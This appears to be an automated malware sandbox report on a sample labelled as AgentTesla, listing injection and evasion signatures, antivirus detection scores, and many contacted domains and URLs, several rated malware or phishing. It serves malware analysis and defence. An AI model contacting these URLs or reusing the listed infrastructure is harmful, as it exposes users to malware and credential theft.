TRELLIAN-AS-APTrellianPtyLimitedAU Australia 17->28 30 www.fhstbanknigeria.com 103.224.212.212, 49713, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 17->30 32 6 other IPs or domains 17->32 40 System process connects to network (likely due to code injection or exploit) 17->40 21 cmmon32.exe 17->21         started        signatures10 process11 signatures12 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          GCeHcfCef8.exe46%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          GCeHcfCef8.exe56%VirustotalBrowse
          GCeHcfCef8.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          totalkfood.com1%VirustotalBrowse
          www.nightoracle.com6%VirustotalBrowse
          www.mtauratarnt.com1%VirustotalBrowse
          www.m-baer.com6%VirustotalBrowse
          shops.myshopify.com0%VirustotalBrowse
          cname.beehiiv.com0%VirustotalBrowse
          www.robertjamesfineclothing.com9%VirustotalBrowse
          www.cryptarrow.com4%VirustotalBrowse
          www.starryallure.com8%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://schemas.micro0%URL Reputationsafe
          http://www.cryptarrow.com0%Avira URL Cloudsafe
          http://www.mtauratarnt.com0%Avira URL Cloudsafe
          http://www.robertjamesfineclothing.com/rs10/?s0=h9cyBphY8kcBiKucT47V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXroGzz3qjH88&CB_=7nEpdJs100%Avira URL Cloudmalware
          http://www.cleaning-products-29334.bond0%Avira URL Cloudsafe
          http://www.zg9tywlubmftzw5ldzi0mdm.com0%Avira URL Cloudsafe
          http://www.rewmio.xyz0%Avira URL Cloudsafe
          http://www.cleaning-products-29334.bond2%VirustotalBrowse
          http://www.mtauratarnt.com1%VirustotalBrowse
          http://www.rewmio.xyz/rs10/www.totalkfood.com100%Avira URL Cloudphishing
          http://www.zg9tywlubmftzw5ldzi0mdm.com/rs10/100%Avira URL Cloudmalware
          http://www.cryptarrow.com4%VirustotalBrowse
          http://www.cryptarrow.comReferer:0%Avira URL Cloudsafe
          http://www.calm-plants.com/rs10/0%Avira URL Cloudsafe
          http://www.robertjamesfineclothing.com100%Avira URL Cloudphishing
          http://www.guillaumecarreau.com/rs10/100%Avira URL Cloudmalware
          http://www.robertjamesfineclothing.com9%VirustotalBrowse
          http://www.cleaning-products-29334.bond/rs10/0%Avira URL Cloudsafe
          http://www.totalkfood.comReferer:0%Avira URL Cloudsafe
          http://www.cryptarrow.com/rs10/www.starryallure.com100%Avira URL Cloudmalware
          http://www.roundaboutlogistics.comReferer:0%Avira URL Cloudsafe
          http://www.omarshafie.online0%Avira URL Cloudsafe
          http://www.roundaboutlogistics.com0%Avira URL Cloudsafe
          http://www.rewmio.xyz2%VirustotalBrowse
          http://www.m-baer.com0%Avira URL Cloudsafe
          http://www.mtauratarnt.com/rs10/100%Avira URL Cloudmalware
          http://www.cryptarrow.com/rs10/100%Avira URL Cloudmalware
          http://www.cryptarrow.com/rs10/www.starryallure.com2%VirustotalBrowse
          http://www.nightoracle.comReferer:0%Avira URL Cloudsafe
          http://www.starryallure.com/rs10/www.roundaboutlogistics.com100%Avira URL Cloudmalware
          http://www.m-baer.com/rs10/?s0=ZZ4PisnlhGWrM+/cjm+8AJE09HfnDkVQJTexn2MBWRnXnlNv1XnPYSI4wm3ClD5tCXKT&CB_=7nEpdJs100%Avira URL Cloudmalware
          http://www.m-baer.com6%VirustotalBrowse
          http://www.guillaumecarreau.comReferer:0%Avira URL Cloudsafe
          http://www.cryptarrow.com/rs10/?s0=/ItgkxO8+brroXQDZXm3WikSbiD+2fsSKu8F0pp3MeXxfp3Mbl7kcl4ctkKIsIVoIHZ+&CB_=7nEpdJs100%Avira URL Cloudmalware
          http://www.mtauratarnt.com/rs10/2%VirustotalBrowse
          http://www.cryptarrow.com/rs10/2%VirustotalBrowse
          https://login.microsoftonline.co100%Avira URL Cloudphishing
          http://www.hdlive7.live/rs10/100%Avira URL Cloudmalware
          http://www.robertjamesfineclothing.com/rs10/100%Avira URL Cloudmalware
          http://www.robertjamesfineclothing.comReferer:0%Avira URL Cloudsafe
          http://www.totalkfood.com/rs10/?s0=slgSrzWs1cS9Mrf67s4eYcm1uzSVXOcUNS0TfgAxqWiu35L4D0Krxoj420pmZqiiSKyn&CB_=7nEpdJs0%Avira URL Cloudsafe
          http://www.mtauratarnt.com/rs10/www.robertjamesfineclothing.com100%Avira URL Cloudmalware
          http://www.mtauratarnt.com/rs10/?s0=pPtLjK/TtyZx8Wb0OUx+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli52Eg/aHEIkd2&CB_=7nEpdJs100%Avira URL Cloudmalware
          http://www.robertjamesfineclothing.com/rs10/www.cleaning-products-29334.bond100%Avira URL Cloudmalware
          http://www.mtauratarnt.comReferer:0%Avira URL Cloudsafe
          www.nightoracle.com/rs10/100%Avira URL Cloudmalware
          http://www.m-baer.com/rs10/100%Avira URL Cloudmalware
          https://login.microsoftonline.co0%VirustotalBrowse
          http://www.m-baer.comReferer:0%Avira URL Cloudsafe
          http://www.m-baer.com/rs10/www.rewmio.xyz100%Avira URL Cloudmalware
          http://www.fhstbanknigeria.com/rs10/www.m-baer.com0%Avira URL Cloudsafe
          http://www.rewmio.xyz/rs10/100%Avira URL Cloudphishing
          https://passwordreset.micros0%Avira URL Cloudsafe
          http://www.totalkfood.com/rs10/www.cryptarrow.com0%Avira URL Cloudsafe
          https://account.activedirectory.0%Avira URL Cloudsafe
          http://www.hdlive7.live100%Avira URL Cloudmalware
          http://www.guillaumecarreau.com/rs10/www.omarshafie.online100%Avira URL Cloudmalware
          http://www.totalkfood.com/rs10/0%Avira URL Cloudsafe
          http://www.guillaumecarreau.com100%Avira URL Cloudmalware
          http://www.fhstbanknigeria.com/rs10/0%Avira URL Cloudsafe
          http://www.nightoracle.com/rs10/100%Avira URL Cloudmalware
          http://www.starryallure.comReferer:0%Avira URL Cloudsafe
          http://www.starryallure.com/rs10/100%Avira URL Cloudmalware
          https://account.li0%Avira URL Cloudsafe
          http://www.starryallure.com100%Avira URL Cloudmalware
          http://www.omarshafie.online/rs10/0%Avira URL Cloudsafe
          http://www.zg9tywlubmftzw5ldzi0mdm.comReferer:0%Avira URL Cloudsafe
          http://www.nightoracle.com100%Avira URL Cloudphishing
          http://www.cleaning-products-29334.bondReferer:0%Avira URL Cloudsafe
          http://www.roundaboutlogistics.com/rs10/www.nightoracle.com0%Avira URL Cloudsafe
          http://www.calm-plants.com/rs10/www.hdlive7.live0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          totalkfood.com
          3.33.130.190
          truetrueunknown
          www.nightoracle.com
          103.224.212.210
          truetrueunknown
          www.fhstbanknigeria.com
          103.224.212.212
          truetrue
            unknown
            www.mtauratarnt.com
            104.21.69.174
            truetrueunknown
            www.m-baer.com
            35.186.223.180
            truefalseunknown
            shops.myshopify.com
            23.227.38.74
            truetrueunknown
            cname.beehiiv.com
            104.19.157.23
            truetrueunknown
            www.robertjamesfineclothing.com
            104.247.82.51
            truetrueunknown
            www.zg9tywlubmftzw5ldzi0mdm.com
            unknown
            unknowntrue
              unknown
              www.totalkfood.com
              unknown
              unknowntrue
                unknown
                www.cryptarrow.com
                unknown
                unknowntrueunknown
                www.roundaboutlogistics.com
                unknown
                unknowntrue
                  unknown
                  www.starryallure.com
                  unknown
                  unknowntrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://www.robertjamesfineclothing.com/rs10/?s0=h9cyBphY8kcBiKucT47V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXroGzz3qjH88&CB_=7nEpdJstrue
                  • Avira URL Cloud: malware
                  unknown
                  http://www.m-baer.com/rs10/?s0=ZZ4PisnlhGWrM+/cjm+8AJE09HfnDkVQJTexn2MBWRnXnlNv1XnPYSI4wm3ClD5tCXKT&CB_=7nEpdJsfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://www.cryptarrow.com/rs10/?s0=/ItgkxO8+brroXQDZXm3WikSbiD+2fsSKu8F0pp3MeXxfp3Mbl7kcl4ctkKIsIVoIHZ+&CB_=7nEpdJstrue
                  • Avira URL Cloud: malware
                  unknown
                  http://www.totalkfood.com/rs10/?s0=slgSrzWs1cS9Mrf67s4eYcm1uzSVXOcUNS0TfgAxqWiu35L4D0Krxoj420pmZqiiSKyn&CB_=7nEpdJstrue
                  • Avira URL Cloud: safe
                  unknown
                  http://www.mtauratarnt.com/rs10/?s0=pPtLjK/TtyZx8Wb0OUx+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli52Eg/aHEIkd2&CB_=7nEpdJstrue
                  • Avira URL Cloud: malware
                  unknown
                  www.nightoracle.com/rs10/true
                  • Avira URL Cloud: malware
                  low
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3804772422.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                    high
                    http://www.cleaning-products-29334.bondexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://excel.office.comexplorer.exe, 00000003.00000000.1327499164.0000000008632000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3804772422.0000000008632000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      http://www.mtauratarnt.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.cryptarrow.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                      • 4%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.zg9tywlubmftzw5ldzi0mdm.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.rewmio.xyzexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.rewmio.xyz/rs10/www.totalkfood.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      https://api.msn.com/v1/news/Feed/Windows?activityId=3B22F7CF85C14EF68AA6229BF5B3705E&timeOut=5000&ocexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexeexplorer.exe, 00000003.00000003.2192098195.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000089B8000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            https://www.msn.com/en-us/health/medical/mayo-clinic-minute-who-benefits-from-taking-statins/ar-AA1hexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              http://www.zg9tywlubmftzw5ldzi0mdm.com/rs10/explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://www.rd.com/list/best-cities-by-generation/explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                http://www.robertjamesfineclothing.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                • 9%, Virustotal, Browse
                                • Avira URL Cloud: phishing
                                unknown
                                http://www.calm-plants.com/rs10/explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.cryptarrow.comReferer:explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.cleaning-products-29334.bond/rs10/explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.guillaumecarreau.com/rs10/explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                http://www.totalkfood.comReferer:explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-darkexplorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  http://www.cryptarrow.com/rs10/www.starryallure.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.roundaboutlogistics.comReferer:explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.1325855618.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193101829.0000000006AD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      https://www.msn.com/en-us/news/us/counterpoint-individual-parents-rights-do-not-translate-to-a-licenexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        http://www.omarshafie.onlineexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.roundaboutlogistics.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.m-baer.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • 6%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.mtauratarnt.com/rs10/explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • 2%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://word.office.comexplorer.exe, 00000003.00000000.1327499164.00000000087FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3804772422.00000000087FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2192098195.00000000087FE000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          http://www.cryptarrow.com/rs10/explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • 2%, Virustotal, Browse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-yearsexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            http://www.nightoracle.comReferer:explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              http://www.starryallure.com/rs10/www.roundaboutlogistics.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://buy.live.com/explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.guillaumecarreau.comReferer:explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://login.microsoftonline.coexplorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: phishing
                                                  unknown
                                                  http://www.hdlive7.live/rs10/explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.robertjamesfineclothing.com/rs10/explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.robertjamesfineclothing.comReferer:explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://outlook.comexplorer.exe, 00000003.00000000.1327499164.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3081706085.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3805799384.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2192098195.0000000008903000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.mtauratarnt.com/rs10/www.robertjamesfineclothing.comexplorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://www.cloudflare.com/5xx-error-landingexplorer.exe, 00000003.00000002.3812069415.0000000010A6F000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3797952972.0000000004DAF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        high
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
